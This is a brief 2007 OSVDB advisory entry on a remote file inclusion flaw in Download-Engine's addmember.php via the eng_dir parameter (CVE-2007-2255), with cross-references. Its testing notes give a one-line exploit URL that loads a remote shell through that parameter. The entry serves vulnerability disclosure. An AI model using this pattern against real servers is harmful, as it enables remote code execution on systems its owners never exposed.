Download-Engine addmember.php eng_dir Variable Remote File Inclusion

2007-04-17T18:44:56
ID OSVDB:35398
Type osvdb
Reporter OSVDB
Modified 2007-04-17T18:44:56

Description

Manual Testing Notes

http://[target]/download_engine_V1.4.3/addmember.php?eng_dir=[Shell-Attack]

References:

Related OSVDB ID: 35399 Related OSVDB ID: 35400 Related OSVDB ID: 35401 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0263.html ISS X-Force ID: 33723 CVE-2007-2255